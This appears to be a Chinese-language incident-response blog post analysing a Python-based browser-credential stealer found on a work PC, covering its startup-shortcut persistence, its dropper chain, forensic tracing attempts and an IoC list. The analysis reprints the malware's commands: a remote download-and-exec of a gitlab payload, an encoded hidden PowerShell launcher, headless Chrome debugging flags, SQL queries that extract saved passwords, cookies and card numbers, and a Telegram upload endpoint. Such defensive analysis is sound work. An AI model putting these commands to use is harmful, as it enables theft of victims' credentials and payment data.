在看 edr log 時看到有抓到一隻程式 synaptics.exe
查看行為會發現它建立許多 chrome 的子程式,並且連線到許多 IP
並且偷取各種瀏覽器密碼 C:\Users\admin\AppData\Local\Temp\[TW_某IP] 電腦名稱.zip
這些操作都在執行後的兩分鐘內完成
往前找會找到 explorer.exe 執行 "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
這段指令
並且可以看到它是由 lnk 檔案執行,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk
路徑在 startup 底下,會在開機時執行
實際連接到電腦上查看,C:\Users\Public\ChromeApplication\synaptics.exe
底下有
Lib 底下為 python library
WindowsSecurity.lnk 的指令為 "C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
而檢查 synaptics.exe 得知為 pythonw.exe,版本為 3.10.11
並有執行 OMENScan/AChoirX: ReWrite of AChoir in Go for Cross Platform 來獲取鑑識資料
查看 https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint
可以看到主程式經過混淆
觀察 gitlab project 頁面,可以看到還有一隻 zk.entrypoint
並且此使用者只建立此 project
使用 kiemdev05
搜尋,可以找到
使用 "blackhat_code/software" - Google 搜尋,可以找到 Automated Malware Analysis - Joe Sandbox Cloud Basic
在 IoC 頁面中可以找到 WindowsSecurity.lnk
,是由 powershell 建立,大概可以確定此病毒是同一隻
查看是如何開始的,可以看到由 Lakatos, K#U00f6ves and Partners.bat 開始執行
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lakatos, K#U00f6ves and Partners.bat" "
Lakatos, K#U00f6ves and Partners.bat 的內容如下
將其進行 base64 decode 後得到
可以看到這段腳本,建立 C:\Users\Public\ChromeApplication 並將 Document_Secure\securedoc.rar 放入
建立 WindowsSecurity.lnk,並將 payload 放入後執行。
查看防火牆 log,確實在建立之後有進行 tg bot 連線
從上面跟下面大概可以知道整個病毒的運作流程,我想找出幾個資訊
從電腦查看可以看到 WindowsSecurity.lnk 的建立時間,時間為兩週前建立
且由於已經重啟過,所以無法查看更早的紀錄
渗透技巧——Windows下NTFS文件的USN Journal
想要查看文件的修改紀錄,可以參考這篇文章,查看 USN Journal
看看能否解析 $LogFile
跟 $MFT
檔案
jschicht/LogFileParser: Parser for $LogFile on NTFS 可以提取各項內容存成 csv 檔案查看
Free Version 可以把 evtx 全部匯入一起查看,但是好像無法查看 $LogFile 內容
kacos2000/MFT_Record_Viewer: $MFT Record Viewer
Master File Table and Computer Forensics
Windows Master File Table (MFT) in Digital Forensics — MCSI Library
這份文件有紀錄相當完整的時間軸操作
可以看到開關機時間與休眠時間,確實是有在該時間點重開機
Download LogViewPlus 比較好用,可以把所有檔案合併起來查看
NVISOsecurity/evtx-hunter: evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files. 可以用來查看統計資料
在 Windows PowerShell 中看到上面提到的 powershell payload 執行紀錄,同個時間為 WindowsSecurity.lnk 建立時間
到這邊就找不下去了,沒有 file operation log,並且有重開機導致資料不完整。
無法找到 .bat 檔案的建立與執行,以及 Document_Secure\securedoc.rar 跟 cmdline,最早只能追溯到 powershell payload 執行
可能還有更前面的執行檔會進行載入
因使用正常的 python 函式庫,並且會將產生檔案刪除,導致無法透過記憶體分析尋找相關資訊
詳細內容請看 kiemdev05 sup02.entrypoint 分析
可以看到裡面有 statut='Không Rõ Trạng Thái'
這是越南文,表示 狀態未知,可以更確定是越南人所寫
另外一隻 zk_entrypoint 雖然沒有出現,但也分析完了,詳情 kiemdev05 zk.entrypoint
在 source code 可以看到會將偷取到的檔案使用 tg bot 傳送出去
查看是否有資訊可以從 api 中取得
這是查看此頻道訊息的 api https://api.telegram.org/bot{token}/getUpdates
嘗試從 tg bot api 收集資訊
/getchatadministrators
可以參考這篇文章 How We Were Able to Infiltrate Attacker Telegram Bots
除了在電腦上看到的痕跡,此 sandbox 還有紀錄其他的程式
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Csc | LOLBAS 寫說此程式是 .NET Framework 用於編譯 C# 程式碼的二進位文件
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aflg023p\aflg023p.cmdline"
aflg023p.cmdline 應該是一個 c# 程式碼文件
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
它將 .res
資源檔案轉換為通用物件檔案格式(COFF).obj
物件文件,連結器可以將其連結到完成的.exe
PE 應用程式檔案中。
用於將資源檔案 (.res) 轉換為可以使用連結器連結的編譯物件。
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1DB.tmp" "c:\Users\user\AppData\Local\Temp\aflg023p\CSCBA3711F82A4D46E8AC7D47C2390FF68.TMP"
這些工具是進行 Living Off the Land Binaries And Scripts
的常用工具,詳細攻擊手法可以參考這篇文章 New Tool to Add to Your LOLBAS List: cvtres.exe - SANS Internet Storm Center
MalwareBazaar | Download malware samples
可以看到與上面所看到的內容相同
使用此 bat 的 hash 進行搜尋,可以找到 a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage
可以看到 cmdline 的檔名會不斷變換
在這篇報告可以看到有進行網路活動 a97df6a45e872b0305a87405b0fe1fb2f59fa3c9054ac90202dbc0bc600f2830 | Triage
但僅有紀錄 DNS
以下資訊僅針對此病毒與受害電腦上所出現之特徵
powershell -ep bypass -w hidden -enc ZgB1AG4AYwB0....
"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
taskkill /F /IM browser.exe
browser.exe --remote-debugging-port=9222 --restore-lastest-session --user-data-dir={path} --profile-directory={profile} --remote-allow-origins=* --headless --window-size=1,1 --disable-gpu --no-sandbox
"C:\Users\Public\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint', verify=False).text)"
http://localhost:9222/json
https://api.telegram.org/bot{TOKEN_BOT}/sendDocument
http://ip-api.com/json/?fields=8195
.facebook.com
https://gitlab.com/blackhat_code/software/-/raw/main/sup02.entrypoint
SELECT item1, item2 FROM metadata;
SELECT a11, a102 FROM nssPrivate WHERE a102 = b'\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01';
SELECT action_url, username_value, password_value FROM logins
SELECT host, path, name, value, isSecure, isHttpOnly, expiry FROM moz_cookies
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards
headers = {'authority': 'adsmanager.facebook.com','accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','accept-language': 'vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5','cache-control': 'max-age=0','sec-ch-prefers-color-scheme': 'dark','sec-ch-ua': '"Chromium";v="112", "Google Chrome";v="112", "Not:A-Brand";v="99"','sec-ch-ua-full-version-list': '"Chromium";v="112.0.5615.140", "Google Chrome";v="112.0.5615.140", "Not:A-Brand";v="99.0.0.0"','sec-ch-ua-mobile': '?0','sec-ch-ua-platform': '"Windows"','sec-ch-ua-platform-version': '"15.0.0"','sec-fetch-dest': 'document','sec-fetch-mode': 'navigate','sec-fetch-site': 'same-origin','sec-fetch-user': '?1','upgrade-insecure-requests': '1','user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36','viewport-width': '794'}